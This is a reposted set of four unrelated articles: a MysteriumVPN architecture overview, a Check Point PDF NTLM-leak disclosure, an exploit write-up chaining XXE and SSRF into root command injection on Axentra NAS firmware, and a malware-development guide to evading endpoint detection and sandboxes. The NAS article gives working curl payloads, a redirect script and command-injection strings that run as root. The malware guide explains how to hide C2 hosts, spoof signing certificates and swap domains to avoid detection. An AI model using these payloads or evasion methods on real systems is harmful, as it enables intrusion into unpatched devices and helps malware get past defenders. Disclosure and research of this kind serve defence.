A look under the hood of a decentralised VPN Application.

( original text byDonatas Kučinskas )

MysteriumVPN is the client application of Mysterium Network, a project focused on providing security and privacy to web 3 applications.

In this article, we will discuss the architecture of MysteriumVPN and how it integrates with Mysterium Node to ensure an encrypted end to end flow of data through Mysterium Network.

Cross-platform architecture

Usually, you need separate builds for each platform. Now that cross-platform technology has improved, this is no longer the case.

For desktop:

Electron is a framework which allows us to build cross-platform applications using common web technologies such as HTMLCSS and Javascript. We are using Electron which allows us to develop one application for two platforms for desktop — Windows and Mac OSLinux coming soon. Download our alpha.

Under the hood of an Electron application, sits a Chromium browser; A website, rendered by an embedded browser.

For mobile:

We are kicking off our mobile development for MysteriumVPN, with Android versions set to release shortly.

For this, we are using React Native for cross-platform applications.

Most of MysteriumVPN is written in Javascript, which is run in a separate process. Javascript generates the virtual structure of the user interface. This Javascript process communicates to native mobile processes which are responsible for rendering the actual user interface as you see it.

The architecture of MysteriumVPN Desktop Client Application

How MysteriumVPN works on desktop:

Since we are using Electron, we have two processes, MAIN and RENDERER.

MAIN is the first process which is started when the application starts. It is a NodeJS process which is responsible for managing the following functions:

  • Application state and internal operations
  • Tray
  • Kicking off the RENDERER process

The second process is RENDERER and it is responsible for displaying the graphical user interface for the application.

Communication between processes:

Both the MAIN and RENDERER processes need to communicate with each other to stay in sync. For this reason, we are using a standard approach of Inter-Process Communication (IPC).

Javascript is not type-safe, which isn’t very reliable. We use Flow static type checker which adds type-safety for Javascript. This especially applies to syncing data between processes — it becomes less reliable when using out-of-the-box IPC. To improve that, with custom implementation on top to have type-safety.

MessageTransport describes a single typed message which is sent between processes. It creates alignment between both processes by introducing sender and receiver objects, ensuring that both sides expect the same arguments of this message.

Here is an implementation:

class MessageTransport<T> {
 _channel: string
 _messageBus: MessageBus
constructor (channel: string, messageBus: MessageBus) {
 this._channel = channel
 this._messageBus = messageBus
 }
buildSender (): MessageSender<T> {
 return new MessageSender(this._channel, this._messageBus)
 }
buildReceiver (): MessageReceiver<T> {
 return new MessageReceiver(this._channel, this._messageBus)
 }
}
class MessageSender<T> {
 _channel: string
 _messageBus: MessageBus
constructor (channel: string, messageBus: MessageBus) {
 this._channel = channel
 this._messageBus = messageBus
 }
send (data: T) {
 this._messageBus.send(this._channel, data)
 }
}
class MessageReceiver<T> {
 _channel: string
 _messageBus: MessageBus
constructor (channel: string, messageBus: MessageBus) {
 this._channel = channel
 this._messageBus = messageBus
 }
on (callback: T => void) {
 this._messageBus.on(this._channel, callback)
 }
removeCallback (callback: T => void) {
 this._messageBus.removeCallback(this._channel, callback)
 }
}

Here is an example of communication between both these MAIN and RENDERER processes:

Example: communicating country proposal updates between processes:

MAIN process is managing country proposals internally and it sends all updates:

this._countryList.onUpdate(countries => {
  this._communication.countryUpdate.send(countries)
})

RENDERER process listens for country updates,

this.rendererCommunication.countryUpdate.on(this.onCountriesUpdate)
...
onCountriesUpdate (countries) {
  this.countriesAreLoading = false
  this.countryList = countries
}

Having such an abstraction layer ensures that communication is type-safe, reliable and features around it are simple to test.

How do we integrate Mysterium Node with MysteriumVPN Application?

Once we’ve rendered the application layer, we still need to connect MysteriumVPN to Mysterium NodeMysterium Nodeis a software that connects you to Mysterium Network where you are able to exchange value for bandwidth.

MysteriumVPN is a client application of Mysterium Network. The successful running of our dVPN on the network will attract other use cases from existing or future businesses that require end-to-end encryption of data, thereby expanding Mysterium Network’s ecosystem.

We require specific information to ensure the successful running of our dVPNservice.

Operation System Service
Since we are running Mysterium Node under the MysteriumVPN application we need to supervise the Mysterium Node to ensure that it works.

Our Data Protection Policy
We make a clear distinction between personal data and usage data. We do not collect information on who you are. We collect data on session and connection inputs and outputs. This is important data for us as it gives us visibility on how our technology fares against the realities of cyber oppression. Check out our privacy policy for more information.

Logging
Since we are integrating Mysterium Node into the MysteriumVPN application, the application itself gets quite complex. That’s why we have to be prepared to log errors from everywhere, — our application, Mysterium Node, and from Electron.

That means that there are three sources of inputs. When we are inspecting something, we need to understand that these errors can happen in three different places. We need to synchronise those and collect all relevant data from these sources.

Data management in the era of web 3 is complex and we hope to do so in an ethical and fair manner. Check out how our no logs policy protects your personal data.

Build on Mysterium Network

We have an npm package that allows for you to connect to Mysterium Nodeeasily. This is the same package that the MysteriumVPN uses to connect to Mysterium Network. This can be used for any application — it’s literally plug and play.

Interested in contributing to Mysterium Network? We are an open source project focused on bringing privacy, security and freedom to web 3. Check out our Github.

Реклама

NTLM Credentials Theft via PDF Files

( Original text by research.checkpoint.com )

Just a few days after it was reported that malicious actors can exploit a vulnerability in MS outlook using OLE to steal a Windows user’s NTLM hashes, the Check Point research team can also reveal that NTLM hash leaks can also be achieved via PDF files with no user interaction or exploitation.

According to Check Point researchers, rather than exploiting the vulnerability in Microsoft Word files or Outlook’s handling of RTF files, attackers take advantage of a feature that allows embedding remote documents and files inside a PDF file. The attacker can then use this to inject malicious content into a PDF and so when that PDF is opened, the target automatically leaks credentials in the form of NTLM hashes.

PDF Background

A PDF file consists primarily of objects, together with Document structure, File structure, and content streams. There are eight basic types of objects:

  • Boolean values
  • Integers and real numbers
  • Strings
  • Names
  • Arrays
  • Streams
  • The null object
  • Dictionaries

A dictionary object is a table containing pairs of objects, called entries.  The first element of each entry is the key and the second element is the value. The key must be a name, and the value may be any kind of object, including another dictionary. The pages of a document are represented by dictionary objects called page objects.  The page objects consist of several required and optional entries.

Proof of Concept

The /AA entry is an optional entry defining actions to be performed when a page is opened (/O entry) or closed (/C entry).  The /O (/C) entry holds an action dictionary. The action dictionary consists of 3 required entries: /S, /F, and /D:

  • /S entry: Describes the type of action to be performed. The GoTo action changes the view to a specified destination within the document. The action types GoToR, (Go To Remote) and GoToE (Go To Embedded), both vulnerable, jump to destinations in another PDF file.
  • /F entry: Exists in GoToR and GoToE, and has slightly different meanings for each. In both cases it describes the location of the other PDF. Its type is file specification.
  • /D entry: Describes the location to go to within the document.

By injecting a malicious entry (using the fields described above together with his SMB server details via the “/F” key), an attacker can entice arbitrary targets to open the crafted PDF file which then automatically leaks their NTLM hash, challenge, user, host name and domain details.

Figure 1: PoC – Injected GoToE action.

In addition, from the target’s perspective there is no evidence or any security alert of the attacker’s activity, which makes it impossible to notice abnormal behavior.

Figure 2: The crafted PDF file has no evidence of the attacker’s actions.

The NTLM details are leaked through the SMB traffic and sent to the attacker’s server which can be further used to cause various SMB relay attacks.

Figure 3: The Leaked NTLM details after the crafted PDF is opened.

 

Affected Products and Mitigation

Our investigation lead us to conclude that all Windows PDF-viewers are vulnerable to this security flaw and will reveal the NTLM credentials.

Disclosure

The issue was disclosed both to Adobe and Foxit.

Foxit indeed fixed the issue as part of 9.1 release.

Adobe fixed the vulnerability as part of the Adobe Reader version released in May (CVE-2018-4993).

IPS Prevention

Check Point customers are protected by the IPS protection:

Multiple PDF readers NTLMv2 Credential Theft

We would also like to thank our colleagues, Assaf Baharav, Yaron Fruchtmann, and Ido Solomon for their help in this research.

zero-day RCE crafted from a tricky XXE, affecting millions of users on NetGear Stora, SeaGate Home, & Medion LifeCloud NAS

( Original text by Paulos Yibelo )

L,DR; not a while ago, right after hearing California is raising its eyebrows on internet-connected device security, Daniel Eshetu and I were exploring the current security state of popular Network Attached Storage (NAS) devices. The California Consumer Privacy ACT,which influenced such measures requires manufacturers to have hardened and above-average enterprise security, enforcing much interesting and unusual care for devices; mainly the so called internet-connected “IoT” devices. In my opinion it should be mandatory to have such security standards for devices that spread so rapidly, especially if they are are mandated correctly and put manufactures on the spot for not caring.

So while dissecting the firmware of the first NAS, it became clear we weren’t dealing with one of those easy-to-compromise kumbaya codebases. Axentra had clean code, no obvious backdoors and even had proper security measures in case something should go wrong. Looking online, ~2 million online NAS can be found. Interesting target, well-spread, good codebase. Our research was supported by the privacy advocate WizCase.

This is a prolonged post detailing how it was possible to craft an RCE exploit from a tricky XXE and SSRF.

About Axentra.

Axentra Hipserv is a NAS OS that runs on multiple devices including NetGear Stora, SeaGate Home, Medion LifeCloud NAS and provides cloud-based login, file storage, and management functionalities for different devices. It’s used in different devices from different vendors. The company provides a firmware with a web interface that mainly uses PHP as a backend. The web interface has a rest API endpoint and a pretty typical web management interface with file manager support.

Firmware Analysis.  

After extracting the firmware using binwalk, the backend source were located in /var/www/html/with the webroot in /var/www/html/html. The main handler for the web interface ishomebase.php, and RESTAPIController.php is the main handler for the rest API. All the php files were encoded using IONCube which has a public decoder, and given the version used was an old one, decoding the files didn’t take long.

Once the files were decoded we proceeded to look at the source code, most of it was well written. During the initial analysis we looked at different configuration files which we thought might come into play. One of them was php.ini located in /etc which contained the configuration line ‘register_globals=on’, this was pretty exciting as turning register_globals on is a very insecure configuration and could lead to a plethora of vulnerabilities. But looking through the entire source code, we could not find any chunk of code exploitable through this method. The Axentra code as mentioned before was well written and variables where properly initialized, used and carefully checked, so register_globals was not going to work.

As we kept looking through the source code and moved on to the REST-API endpoint things got a little more interesting, the initial requests are routed through RESTAPIController.phpwhich loads proper classes from /var/www/html/classes/REST and the service classes were in/var/www/html/classes/REST/services in individual folders. While looking through the services most of them were properly authenticated, but there were a few exceptions that were not, one of these was the request aggregator endpoint located at/www/html/classes/REST/services/aggregator in the filesystem and/api/2.0/rest/aggregator/xml from the web url. We will look at how this service works and how we were able to exploit it.

The first file in the directory was AxAggregatorRESTService.php. This file defines and constructs the rest service. Files of the same structure exist in every service directory with different names ending with the same RESTService.php suffix. In this file there were interesting lines (shown below). Note that line numbers might be inaccurate since the files were decoded and we didn’t bother to remove the header generated by the decoder (a block of comment at the beginning of each file plus random breaks).

JUICE A: /var/www/html/classes/REST/services/aggregator/AxAggregatorRESTService.php

line 13: private $requiresAuthenticatedHipServUser = false//This shows the service does not require authentication.
line 14: private $serviceName = ‘aggregator’; //the service name..

line 1718:
if (( count( $URIArray ) == 1 && $URIArray[0] == ‘xml’ )) { // If number of uri paths passed to the service is 1 and the first path to the service is xml
                $resourceClassName = $this->loadResourceClass( ‘XMLAggregator’ ); // Load a resource class XMLAggregator

The code on line 18 calls a function called loadResourceClass with is provided by axentras RESTAPI framework and loads a resource (service handler) class/file from the current rest services directory after adding the appropriate prefix (Ax) and suffix (RESTResource.php). The code for this function is shown below.

classes/REST/AxAbstractRESTService.php

line 2530:
function loadResourceClass($resourceName) {
$resourceClassName = ‘Ax’ . $this->resourcesClassNamePrefix . ucfirst( $resourceName ) .‘RESTResource’;
require_once( REST_SERVICES_DIR . $this->serviceName . ‘/’ . $resourceClassName .‘.php’ );
return $resourceClassName;
}
}

The next file we had to look at was AxXMLAggregatorRESTResource.php which is loaded and executed by the REST framework. This file defines the functionality of the REST API endpoint, inside of it is where our first bug was found (XXE). Let’s take a look at the code.

/var/www/html/classes/REST/services/aggregator/AxXMLAggregatorRESTResource.php

line 14:
DOMDocument $mDoc = new DOMDocument(); //Intialize a DOMDocument loader class

line 16:
if (( ( ( $requestBody == » || !$mDoc->loadXML( $requestBody, LIBXML_NOBLANKS ) ) ||!$mRequestsNode = $mDoc->documentElement ) || $mRequestsNode->nodeName != ‘requests’)) {
AxRecoverableErrorException;
throw new ( null, 3 );
}

Now as you can see on the 16th line this file loads xml from the user without validation. Now most php programmers and security researchers would argue this is not vulnerable since external entity loading is disabled in libxml by default and since our code has not called

libxml_disable_entity_loader(false), but one thing to note here is the Axentra firmware uses the libxml library to parse xml data, and libxml started disabling external entity loading by default starting from libxml2 version 2.9 but Axentras firmware has version 2.6 which does not have external entity loading disabled by default, and this leads to an XXE attack, the following request was used to test the XXE.

curl command with output:

Command:

curl kd ‘<?xml version=»1.0″?><!DOCTYPE requests [ <!ELEMENT request (#PCDATA)> <!ENTITY % dtd SYSTEM «http://SolarSystem:9091/XXE_CHECK»> %dtd; ]> <requests> <request href=»/api/2.0/rest/3rdparty/facebook/» method=»GET»></request> </requests>’http://axentra.local/api/2.0/rest/aggregator/xml

Output:

<?xml version=»1.0″?>
<responses>
<response method=»GET» href=»/api/2.0/rest/3rdparty/facebook/»>
<errors><error code=»401″ msg=»Unauthorized»/></errors>
</response>
</responses>%

which produced the following on out listening server:

root@Server:~# nc -lvk 9091
Listening on [0.0.0.0] (family 0, port 9091)
Connection from [axentra.local] port 9091 [tcp/*] accepted (family 2, sport 41528)
GET /XXE_CHECK HTTP/1.0
Host: SolarSystem:9091

^C
root@Server:~#

Now that we had XXE working, we could try and read files and try to dig out sensitive info, but ultimately we wanted full remote control. The first thought was to extract the sqlite database containing all usernames and passwords, but this turned out to be a no go since xxe and binary data don’t work so well together, even encoding the data using php filters would not work. And since this method would have required another RCE in the webinterface to take full control of the device, we thought of trying something new.

Since we could make a request from the device (SSRF), we tried to locate endpoints that bypass authentication if the request came from localhost (very common issue/feature?). However, we could not find any good ones and so we moved into the internals of the NAS system specifically how the system executes commands as root (privileged actions). Now this might have not been something to look at if the user-id the web server is using had some sort of sudo privilege, but this was not the case. And since we saw this during our initial overlook of the firmware we knew there was another way the system was executing commands. After a few minutes of searching we found a daemon that the system used to execute commands and found php scripts that communicate with this daemon. We will look at the details below.

The requests to this daemon are sent using xml format and the file is located in/var/www/html/classes/AxServerProxy.php, which calls a function named systemProxyRequestto send the requests. The systemProxyRequest is located in the same file and the code is given below.

/var/www/html/classes/AxServerProxy.php:

line 15641688:
function systemProxyRequest($command, $operation, $params = array(  ), $reqData = ») {
$Proc = true;
$host = ‘127.0.0.1’;
$port = 2000;
$fp = fsockopen( $host, $port, $errno, $errstr );
if (!$fp) {
AxRecoverableErrorException;
throw new ( ‘Could not connect to sp server’, 4 );
}
if ($Proc) {
unset( $root );
DOMDocument;
$doc = new ( ‘1.0’ );
$root = $doc->createElement( ‘proxy_request’ );
$cmdNode = $doc->createElement( ‘command_name’ );
$cmdNode->appendChild( $doc->createTextNode( $command ) );
$root->appendChild( $cmdNode );
$opNode = $doc->createElement( ‘operation_name’ );
$opNode->appendChild( $doc->createTextNode( $operation ) );
$root->appendChild( $opNode );

if ($reqData[0] == ‘<‘) {
if (substr( $reqData, 0, 5 ) == ‘<?xml’) {
$reqData = preg_replace( ‘/<\?xml.*?\?>/’, », $reqData );
}

DOMDocument;
$reqDoc = new (  );
$reqData = str_replace( », », $reqData );
$reqDoc->loadXML( $reqData );
$mNewNode = $doc->importNode( $reqDoc->documentElement, true);
$dNode->appendChild( $mNewNode );
}
….
$root->appendChild( $dNode );
}
if ($root) {
$doc->appendChild( $root );
fputs( $fp, $doc->saveXML(  ) . » );
}

$Resp = »;
stream_set_timeout( $fp, 120 );
while (!feof( $fp )) {
$Resp .= fread( $fp, 1024 );
$info = stream_get_meta_data( $fp );

if ($info[‘timed_out’]) {
return array( ‘return_code’ => ‘FAILURE’, ‘description’ => ‘System Proxy Timeout’, ‘error_code’ => 4, ‘return_message’ => », ‘return_value’ => » );
}
}

As clearly seen above the function takes xml data and cleans out a few things like spaces and sends it to the daemon listening on port 2000 of the local machine. The daemon is located at/sbin/oe-spd and is a binary file, so we looked into it using IDA, the following pieces of code were generated by the Hex-Rays decompiler in IDA.

in function sub_A810:

This function receives the data from the socket as an argument (a2) and parses it.

JUICE B:

signed int __fastcall sub_A810(int a1, const char **a2) line 52:

v10 = strstr(*v3, «<?xml version=\»1.0\»?>»); // strstr skips over junk data until requested string is found (<?xml version=1.0 ?>)

The line above is important to us mainly because the request is sent through the HTTP protocol so the daemons «feature» to skip over the junk data allows us to embed our payload in an http request to http://127.0.0.1:2000 (the daemons port) without worrying about formatting or the daemon bailing because of unknown characters; it does the same thing with junk data after the xml too.

Now, we skipped over looking into how the whole oe-spd daemon code works, mainly because we had our sights set on finding and exploiting a simple RCE bug, and we had all we need to test out a few ways we could go about achieving that, we had the format of the messages fromAxServerProxy.php and some from usr/lib/spd/scripts/. The method we used to find the RCE was sending the request through curl, and tracing the process with strace while running in a qemu environment, this helped us filter out execve calls with the right parameters to use as a payload. As a note there were A LOT of vulnerable functions in this daemon, but in the following we only show the one we used to achieve RCE. The interested one’s among you can explore the daemon using the hints we gave above.

curl command and response:

curl -vd ‘<?xml version=»1.0″?><proxy_request><command_name>usb</command_name><operation_name>eject</operation_name><parameter parameter_name=»disk»>BOGUS_DEVICE</parameter></proxy_request>’ http://127.0.0.1:2000/
*   Trying 127.0.0.1…
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 2000 (#0)
> POST / HTTP/1.1
> Host: 127.0.0.1:2000
> User-Agent: curl/7.61.1
> Accept: */*
> Content-Length: 179
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 179 out of 179 bytes

<?xml version=»1.0″?>
<proxy_return>
<command_name>usb</command_name>
<operation_name>eject</operation_name>
<proxy_reply return_code=»SUCCESS» description=»Operation successful» />
</proxy_return>

strace command and output

sudo strace -f -s 10000000 -q -p 2468 -e execve
[pid  2510] execve(«/usr/lib/spd/usb», [«/usr/lib/spd/usb»], 0x63203400 /* 22 vars */ <unfinished …>
[pid  2511] +++ exited with 0 +++
[pid  2510] <… execve resumed> )      = 0
[pid  2513] execve(«/bin/sh», [«sh», «-c», «/usr/lib/spd/scripts/usb/usbremoveall /dev/BOGUS_DEVICE manual»], 0x62c67f10 /* 22 vars */ <unfinished …>
[pid  2514] +++ exited with 0 +++
[pid  2513] <… execve resumed> )      = 0
[pid  2513] execve(«/usr/lib/spd/scripts/usb/usbremoveall», [«/usr/lib/spd/scripts/usb/usbremoveall», «/dev/BOGUS_DEVICE», «manual»], 0x62a65800 /* 22 vars */ <unfinished …>
[pid  2515] +++ exited with 0 +++
[pid  2513] <… execve resumed> )      = 0
[pid  2517] execve(«/bin/sh», [«sh», «-c», «grep /dev/BOGUS_DEVICE /etc/mtab»], 0x63837f80 /* 22 vars */ <unfinished …>
[pid  2518] +++ exited with 0 +++
[pid  2517] <… execve resumed> )      = 0
[pid  2517] execve(«/bin/grep», [«grep», «/dev/BOGUS_DEVICE», «/etc/mtab»], 0x64894000 /* 22 vars */ <unfinished …>
[pid  2519] +++ exited with 0 +++
[pid  2517] <… execve resumed> )      = 0
[pid  2520] +++ exited with 1 +++
[pid  2517] +++ exited with 1 +++
[pid  2513] — SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=2517, si_uid=0, si_status=1, si_utime=4, si_stime=3} —
[pid  2516] +++ exited with 1 +++
[pid  2513] +++ exited with 1 +++
[pid  2510] — SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=2513, si_uid=0, si_status=1, si_utime=16, si_stime=6} —
[pid  2512] +++ exited with 0 +++
[pid  2510] +++ exited with 0 +++
[pid  2508] — SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=2510, si_uid=0, si_status=0, si_utime=4, si_stime=1} —
[pid  2509] +++ exited with 1 +++
[pid  2508] +++ exited with 1 +++

the command execution bug should be clearly visible here, but in case you missed it, the 4th line in the strace output shows out input (BOGUS_DEVICE) being passed to a /bin/sh call, now we send a test injection to see if our command execution works.

curl command and output:

curl -vd ‘<?xml version=»1.0″?><proxy_request><command_name>usb</command_name><operation_name>eject</operation_name><parameter parameter_name=»disk»>`echo pwnEd`</parameter></proxy_request>’ http://127.0.0.1:2000/

<?xml version=»1.0″?>
<proxy_return>
<command_name>usb</command_name>
<operation_name>eject</operation_name>
<proxy_reply return_code=»SUCCESS» description=»Operation successful» />
</proxy_return>

Strace output:

[pid  2550] execve(«/usr/lib/spd/usb», [«/usr/lib/spd/usb»], 0x63203400 /* 22 vars */ <unfinished …>
[pid  2551] +++ exited with 0 +++
[pid  2550] <… execve resumed> )      = 0
[pid  2553] execve(«/bin/sh», [«sh», «-c», «/usr/lib/spd/scripts/usb/usbremoveall /dev/`echo pwnEd` manual»], 0x6291cf10 /* 22 vars */ <unfinished …>

If you take a close look of the output, it can be seen that «echo pwnEd» command we gave in backticks has been evaluated and the output is being used as a part of a later command. To make this PoC simpler, we just write a file in /tmp and see if it exists in the device.

curl -vd ‘<?xml version=»1.0″?><proxy_request><command_name>usb</command_name><operation_name>eject</operation_name><parameter parameter_name=»disk»>dev_`id>/tmp/pwned`</parameter></proxy_request>’ http://127.0.0.1:2000/

Now we have complete command execution. In order to chain this bug with our XXE and SSRF we have to make the xml parser send a request to http://127.0.0.1:2000/ with the payload. Although sending a normal http request to the daemon was not a problem, things fell apart when we tried to append the payload as a url location in the xml file, the parser failed with an error (Invalid Url) so we had to change our approach. After a few failed attempts we figured out the libxml http client correctly follows 301/2 redirections and this does not make the parser fail since the url given in the redirection does not pass through the same parser as the initial url in the xml data, so we created a little php script to redirect the libxml http client to http://127.0.0.1:2000/ with the payload embedded as a url path. The script is shown below.

redir.php:

<?php
if(isset($_GET[‘red’]))
{
header(‘Location: http://127.0.0.1:2000/a.php?d=<?xml version=»1.0″?><proxy_request><command_name>usb</command_name><operation_name>eject</operation_name><parameter parameter_name=»disk»>a`id>/var/www/html/html/pwned.txt`</parameter></proxy_request>»»‘); //302 Redirect

}
?>

Then we ran this on our server the commands we used and the final

output is given below.

curl command and output:

curl -kd ‘<?xml version=»1.0″?><!DOCTYPE requests [ <!ELEMENT request (#PCDATA)> <!ENTITY % dtd SYSTEM «http://SolarSystem:9091/redir.php?red=1″> %dtd; ]> <requests> <request href=»/api/2.0/rest/3rdparty/facebook/» method=»GET»></request> </requests>’ http://axentra.local/api/2.0/rest/aggregator/xml
<?xml version=»1.0″?>
<responses>
<response method=»GET» href=»/api/2.0/rest/3rdparty/facebook/»>
<errors><error code=»401″ msg=»Unauthorized»/></errors>
</response>
</responses>%

root@Server:~# php -S 0.0.0.0:9091
PHP 7.0.32-0ubuntu0.16.04.1 Development Server started at Thu Nov  1 16:02:16 2018
Listening on http://0.0.0.0:9091
Document root is /root/…
Press Ctrl-C to quit.
[Thu Nov  1 16:02:43 2018] axentra.local:39248 [302]: /redir.php?red=1

As seen above the php script sent a 302 (Found) response to the libxml http client which should redirect it to http://127.0.0.1:2000/a.php?d=<?xml version=»1.0″?><proxy_request><command_name>usb</command_name><operation_name>eject</operation_name><parameter parameter_name=»disk»>a`id>/var/www/html/html/pwned.txt`</parameter></proxy_request>»»

The above redirection should execute our command injection and create a pwned.txt file in the webroot with the output of id, the following request checks the output and existence of the file.

curl command and output:

curl -k http://axentra.local/pwned.txt
uid=0(root) gid=0(root)

Yay! our pwned.txt has been created and the exploit was successful. We have a video demo showing the full exploit chain from XXE to SSRF to RCE being used to create a reverse root shell. We will post the video and the exploit code soon.

Timeline

This research was the basis of us looking into more NAS devices, like WD MyBook and discovering multiple critical root RCE vulnerabilities that ultimately impacted millions of devices from western countries were published on our research published on WizCase blog here. Unfortunately, Axentra, the affected devices, and even WD, chose silence. Some have responded saying there will NOT BE any patches for the vulnerabilities affecting millions!

This is where, soon in the future, the enforced involvement of laws like The California Consumer Privacy ACT can come to play by holding manufactures responsible for their actions, in this case, at-least regarding patching!

Malware on Steroids Part 3: Machine Learning & Sandbox Evasion

 

( Original text by Paranoid Ninja )

It’s been a busy month for me and I was not able to save time to write the final part of the series on Malware Development. But I am receiving too many DMs on Twitter accounts lately to publish the final part. So here we are.

If you are reading this blog, I am basically assuming that you know C/C++ and Windows API by now. If you don’t, then you should go back and read my other blogs on Static AV Evasion and Malware Development using WINAPI (basics).

In this post, we will be using multiple ways to evade endpoint detection mechanisms and sandboxes. Machine Learning is applied at two major levels in most organization. One is at the network level where it tries to identify anomalies based on the behavior of network connections, proxy logs and pattern of connections over time. Most Network ML Solutions tend to analyze beacons of malwares and DPI (deep packet inspection) to identify the malware. This is something that Microsoft ATA (Advanced Threat Analytics), or FireEye sandboxes do. On the other hand, we have Endpoint agents like Symantec EP, Crowdstrike, Endgame, Microsoft Cloud Defender and similar monitoring tools which perform behavioral analysis of the code along with signature detection to detect malicious processes.

I will purely be focusing on multiple ways where we can make our malware behave like a legitimate executable or try to confuse the Endpoint agent to evade detection. I’ve used the methods mentioned in this blog to successfully evade Crowdstrike Agent, Symantec EP and Microsoft Windows Cloud Defender, the videos of the latter which I have already posted in my previous blogs. However, you might need to modify or add new techniques as this might become detectable over time. One of the best ways to avoid AV is to disable the Process creation altogether and just use WINAPI. But that would mean carefully crafting your payloads and it would be difficult to port them for shellcoding. That’s the main reason malware authors write their malwares in C, and only selected payloads in shellcode. A combination of these two makes malwares unbeatable on all fronts.

Each of the techniques mentioned below creates a unique signature which most AVs won’t have. It’s more of a trail and error to check which AVs detect which techniques. Also remember that we can use stubs and packers for encryption, but that’s for a different blog post that I will do later.

P.S.: This blog is exclusive of shellcodes, reason being I will be writing a separate blog series on windows Shellcoding later. I will be using encrypted functions during the shellcoding part and not in this post. This post is specifically how Malware authors use C to perform evasions. You can also use the same APIs and code snippets mentioned below to craft a custom malware for Red Teaming.

main():

So, before we start let’s try to get a based understanding of how Machine learning works. Machine learning is purely focused on the behaviour of the user (in case of endpoints). In short, if we sign our malware and try to make it act like a legitimate executable, it becomes really easy to evade ML. I’ve seen people using PowerShell to write reverse shells, but they get easy detectable due to Microsoft’s AMSI (Anti-Malware Scan Interface) which consistently keeps on checking (including and mainly PowerShell) to detect malicious process executions and connections.  For those of you who don’t know, Microsoft uses DMTK(Microsoft Distributed Machine Learning Toolkit) framework which is basically a decision tree based algorithm which specifies whether a file is malicious or not. PowerShell is very tightly controlled by Microsoft and it gets harder over time to evade ML when using PowerShell.

This is the reason I decided to switch to C and C++ to get reverse shells over network so that I could have flexibility at a lower level to do whatever I want. We will be using a lot of windows APIs, encrypted variables and a lot of decision tree of our own to evade ML. This it supposed to work till Microsoft doesn’t start using CNTK framework which is a much better framework than DMTK, but harder to apply at the same time.

Encrypted Host & Process Names

So, the first thing to do is to encrypt our hostname. We can possibly use something as simple as XOR, or any custom complicated mathematical equation to decrypt our encrypted variable to get the hostname. I created a python script which takes a hostname and a character and returns a Xor’d Array:

As you can see, it gives the Key value in integer of the Xor Key, the length of the encrypted array and the whole Encrypted array which we can simply use in a C integer or char array.

The next step is to decrypt this array at runtime and we need to hardcode the key inside the executable. This is the only key that we would be hardcoding into the code. Also, to make it complicated for the reverse engineer, we will write a C function to automatically detect that the last integer is the key and use that to loop through the array to decrypt the encrypted string. Below is how it would look like

So, we are creating a char buffer of the size of EncryptedHost on heap. We are then passing the host, length and decrypted host variable to the Decrypter function. Below is how the Decrypter function looks:

To explain in short, it creates an Encrypted Integer array of our char array  and xors them back again using the key to convert the encrypted value to the original value and stores them in the DecryptedData array we created previously. With the help of this, if someone runs strings, they wouldn’t be able to see any host in the executable. They would need to understand the math and set a proper breakpoint in Debugger to fetch the C2 host. You can create more complicated mathematical equations to decrypt host if required. We can now use this DecryptedData array within our sockets to connect to the remote host.

P.S.: Reverse Engineers & Sandboxes can fetch the C2 names with the help of packet captures and DNS Name Resolutions. It is better to send raw packets to multiple hosts to confuse which one is the real C2 server. But at the same time, this can lead to easy  detection of the malware. Check my Legitimate Domain Routing technique below which is much better than using this.

If you’ve read my previous post, then you know that I created a cmd.exe process using the CreateProcessW winAPI. We can do what we did above for Creating Processes as well. But instead of hardcoding the Encrypted array for the Process to be executed, we will send the process name as an array over network once the executable connects to the C2 Server along with the host. We can also use authentication on C2 server, and only allow it to connect if it sends a proper key. Below is the Code for Creating Processes using Encrypted Char array over sockets

In this way, when a system sandboxes our executable, it won’t know that what process are we executing beforehand inside a sandbox. Below is a much clearer description of what we are doing:

  1. Decrypt C2 host at runtime and connect to host
  2. Receive password and verify if it is right
  3. If the key is right, wait for 5 seconds to receive encrypted array(process name) over socket
  4. Decrypt the received Process and run it using CreateProcessW API

With the help of the above technique, if our C2 is down, then the sandbox/analyst will not be able to find what we are executing since we have not hardcoded any processes to execute.

Code Signing with Spoofed Certs

I wrote a Script in python which can fetch and create duplicate certificates from any website which we can use for code signing. One thing I noticed is that Antiviruses don’t check and verify the whole chain of the certificate. They don’t even verify the authenticity. The main reason being not every antivirus can connect to internet in every organization to fetch and verify the ceritificates for every third party application installed. You can find the Certificate spoofing python script on my GitHub profile here.

And this is the scan results of Windows ML Defender after Signing:

Next thing is we will try to add a few features to our malware to detect if we are running in a sandbox or inside a virtual machine. We will try to evade Sandboxes as much as possible and kill our executable as soon as we find anything suspicious. We need to make sure that our malware doesn’t even look suspicious. Because if it does, then the sandbox will quarantine it and send an alert that there is a suspicious process running. This is worse than detection because this is where most SOC detects the malware and the Red Teaming gets detected.

Legitimate Domain Routing (Evade Proxy Categorization Detection and Endpoint Detection)

This is one of the best techniques I’ve found out till date which almost works every time. Let’s say I buy a C2 domain named abc.com. I will modify the A records so that it points to Microsoft.com or some similar legitimate site for a month or so. When the malware executes on the vicim’s system, it will connect to this domain which will send a normal HTTP reply from Microsoft and the malware will go to sleep for a few hours and then loop into doing the same thing. Now whenever I want to get a reverse shell of my malware, I will simply change the A records of abc.com to my C2 hosting server and it will send a key in HTTP to the malware which will trigger it to fetch shellcode or send a shell back to my C2. This way, our abc.com will also get categorized as a legitimate domain instead of malicious or phishing site. And even the Endpoint systems will not block it since it is contacting a legitimate domain. Over time I’ve also used Symantec’s website to connect as a temporary domain, later changing it to my malicious C2 server.

Check System Uptime & Idletime (Evades Virtual Machine Sandboxes)

If our executable is running in a virtual machine, the uptime will be pretty short since it will boot up, perform analysis on our binary and then shutdown. So, we can check the uptime of the machine and sleep till it reaches 20-30 minutes and then run it. Make sure to use NTP to check the time with external domain, else Sandboxes can fast-forward system time for process executions. Checking via NTP will make sure that correct time is checked. Below is the code to check uptime of a system and also idle time in case required.

Idletime:

Uptime:

Check Mac Address of Virtual Machine (Known OUIs)

Vmware, Virtual box, MS Hyper-v and a lot of virtual machine providers use a fixed MAC Unique identifier which can be used to run in a loop to check if current mac address matches to any of those mentioned in the list. If it is, then it is highly possible that the malware is running in a virtual environment, mostly for the purpose of sandboxing and reverse engineering. Below are the OUIs that I know for the moment. If there are more, do let me know in the comments.

